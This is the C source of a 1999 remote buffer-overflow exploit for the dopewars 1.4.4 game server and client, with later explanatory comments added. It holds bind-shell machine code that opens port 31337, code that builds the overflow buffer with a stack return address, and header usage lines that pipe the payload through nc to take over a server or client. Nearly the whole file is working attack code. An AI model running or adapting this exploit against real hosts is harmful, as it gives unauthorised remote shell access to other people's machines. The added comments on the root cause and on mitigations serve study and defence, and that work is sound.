Remote exploit for dopewars-1.4.4. Exploit works for servers as well as clients. Produces a shell.
6ba59e6009b05be123b6af5928e78b018f173818061ec3c4bfedafabca9b0987
/*
* dopewarez.c - Exploit for dopewars-1.4.4 client/server. Produces a shell.
*
* URL: http://bellatrix.pcl.ox.ac.uk/~ben/dopewars/
*
* C0de by nuuB [Sep 25, 1999]. Linux version.
*
* 0wn a server:
*
* (dopewarez [<offset>] | nc <server> 7902)& ; sleep 5 ; nc <server> 31337
*
* 0wn a client using a bogus server:
*
* (dopewarez 2285 | nc -l -p 7902) & ; wait4client ; nc <client> 31337
*
* Overflow occurs in ProcessMessage().
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
/* Layout constants for the message built in main(). Each *_OFFSET is a
 * byte position inside egg[]; the values are specific to the
 * dopewars-1.4.4 build the author targeted and are not derived anywhere
 * in this file. */
#define EGGSIZE 598
#define EIP_OFFSET 208
#define FIRST_OFFSET 236
#define WRD_STACK_OFFSET 0x0bb0 /* approximate for server */
/* Presumably a fixed top-of-stack address for a 32-bit Linux of the
 * period, minus a structure offset -- only meaningful on a host without
 * ASLR. The macro is an unparenthesised expression; that is safe here
 * only because its single use in main() passes it whole as an argument. */
#define OWNED_FIRST 0xbffffffc-132 /* 132 = offset for Player->next */
/* Byte length of c0de[] below (13 full 16-byte lines plus 5 = 213).
 * Nothing in the file checks that the two agree; a _Static_assert
 * against sizeof c0de - 1 would. */
#define C0DE_SIZE 213
/* Machine-code payload, reproduced verbatim from the listing and not
 * annotated here. The file header states it yields a shell; from a
 * defender's side the byte sequence is useful mainly as a pattern to
 * match on in network or memory captures. */
char c0de[]="\xbc\xfc\xff\xff\xbf\xeb\x02\xeb\x0c\xe8\xf9\xff\xff\xff\x2f\x62"
"\x69\x6e\x2f\x73\x68\x5d\x31\xc0\x89\xc3\x89\xc1\xb0\x46\xcd\x80"
"\x31\xc9\x51\x41\x51\x41\x51\x89\xe1\x31\xdb\x43\x31\xc0\x04\x66"
"\xcd\x80\x8d\x64\x24\x0c\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\x7a"
"\x69\x04\x02\x66\x50\x89\xe3\x31\xc0\x04\x10\x50\x53\x57\x89\xe1"
"\x31\xdb\xb3\x02\x31\xc0\x04\x66\xcd\x80\x85\xc0\x75\x6f\x8d\x64"
"\x24\x1c\x31\xc0\x50\x57\x89\xe1\x31\xdb\xb3\x04\x31\xc0\x04\x66"
"\xcd\x80\x8d\x64\x24\x08\x31\xc0\x04\x10\x50\x89\xe3\x8d\x64\x24"
"\xf0\x89\xe1\x53\x51\x57\x89\xe1\x31\xdb\xb3\x05\x31\xc0\x04\x66"
"\xcd\x80\x8d\x64\x24\x20\x89\xc7\x89\xfb\x31\xc9\xb0\x3f\xcd\x80"
"\x89\xfb\x31\xc9\x41\xb0\x3f\xcd\x80\x89\xfb\x31\xc9\x80\xc1\x02"
"\xb0\x3f\xcd\x80\x31\xc0\x88\x45\x07\x89\x6d\x08\x89\x45\x0c\x8d"
"\x55\x0c\x8d\x4d\x08\x89\xeb\x31\xc0\xb0\x0b\xcd\x80\x31\xdb\x31"
"\xc0\xb0\x01\xcd\x80";
/* The message buffer. The extra byte holds the NUL that strcpy() in
 * main() writes at egg[EGGSIZE]; without it that write would be out of
 * bounds. */
char egg[EGGSIZE+1];
/* Emit a one-line diagnostic on stdout -- the same stream the message
 * itself is written to -- and terminate the process with status 1.
 * Never returns. */
void bail(char *s) {
    fputs(s, stdout);
    fputc('\n', stdout);
    exit(1);
}
/*
 * Serialise the low 32 bits of num as four raw bytes into a static,
 * NUL-terminated buffer and return it. The buffer is shared between
 * calls: each call overwrites the previous result, and the caller must
 * copy what it needs before calling again.
 *
 * The byte order comes from htonl(): on a little-endian host the bytes
 * are emitted least-significant first (hence the "LE" in the name); on
 * a big-endian host htonl() is the identity and the order is reversed,
 * so the function is not portable.
 *
 * A zero byte or a '^' anywhere in the four bytes aborts via bail():
 * main() copies the result with str* functions and closes the message
 * with '^', so either byte would truncate the message early.
 */
char *htol_LEstr(unsigned long num) {
    static char out[5];
    unsigned long swapped = htonl(num);

    for (int i = 0; i < 4; i++) {
        out[i] = (char)((swapped >> (24 - 8 * i)) & 0xff);
    }
    out[4] = '\0';

    if (strlen(out) != 4) {
        bail("NULL detected!");
    }
    if (strchr(out, '^')) {
        bail("caret detected!");
    }
    return out;
}
/*
 * Build the oversized message ("egg") and write it to stdout. The file
 * header shows stdout being piped into nc, so everything on stdout is
 * wire data; the only diagnostic goes to stderr.
 *
 * argv[1] (optional): a value starting with "0x" replaces the computed
 * return address outright; anything else is parsed with atoi() and
 * added to it.
 * Returns 0. bail() inside htol_LEstr() exits with status 1 instead.
 *
 * Defensive note: the message is delimited only by the trailing '^'
 * (see the strcpy below), so a receiver that copies it into a fixed
 * stack buffer without checking its length -- the header names
 * ProcessMessage() -- is the root cause. Length-checked parsing removes
 * the bug; a non-executable stack and ASLR invalidate the fixed
 * addresses this layout relies on.
 */
int main(int argc, char *argv[]) {
unsigned long eip;
/* Estimate the target's stack position from this process's own stack.
 * WRD_STACK_OFFSET is marked "approximate for server" above, so this is
 * a heuristic, not a measured value. The second line aims at the
 * middle of the 'A' filler between FIRST_OFFSET+4 and the payload
 * copied in further down. */
eip=(unsigned long)((char *)&eip-WRD_STACK_OFFSET);
eip+=FIRST_OFFSET+4+(EGGSIZE-2-FIRST_OFFSET-4-C0DE_SIZE)/2;
if(argc >= 2) {
if(!strncmp("0x", argv[1], 2)) /* Absolute */
eip=strtoul(argv[1], 0, 0);
else
eip+=atoi(argv[1]); /* atoi() reports no errors; non-numeric input adds 0 */
}
/* NOTE(review): %08x expects unsigned int but eip is unsigned long;
 * on an LP64 host that is a format/argument mismatch. The whole file
 * assumes a 32-bit Linux host. */
fprintf(stderr, "Using EIP=0x%08x\n", eip);
/* Filler first; every later write overlays a slice of it. */
memset(egg, 'A', EGGSIZE);
/* A two-byte prefix followed by a 4-byte address slot at EIP_OFFSET,
 * and the same shape again at FIRST_OFFSET with the fixed OWNED_FIRST
 * value. htol_LEstr() rejects any NUL or '^' in the 4 bytes because
 * both would cut the message short. strncpy with an exact count is
 * used deliberately: the sources are not NUL-terminated at that length. */
strncpy(egg+EIP_OFFSET-2, "\xeb\x04", 2);
strncpy(egg+EIP_OFFSET, htol_LEstr(eip), 4);
strncpy(egg+FIRST_OFFSET-2, "\xeb\x04", 2);
strncpy(egg+FIRST_OFFSET, htol_LEstr(OWNED_FIRST), 4);
/* Payload sits immediately before the terminator; memcpy copies all
 * C0DE_SIZE bytes regardless of content, unlike the str* calls above. */
memcpy(egg+EGGSIZE-2-C0DE_SIZE, c0de, C0DE_SIZE);
/* '^' closes the message. strcpy also writes a NUL at egg[EGGSIZE],
 * which is why egg[] is declared EGGSIZE+1 bytes long. */
strcpy(egg+EGGSIZE-2, "^\n");
/* printf("%s") stops at the first NUL, so the message is emitted intact
 * only if none of the copied bytes is zero -- htol_LEstr() guards its
 * part of that, nothing guards c0de[]. */
printf("%s", egg);
return 0;
}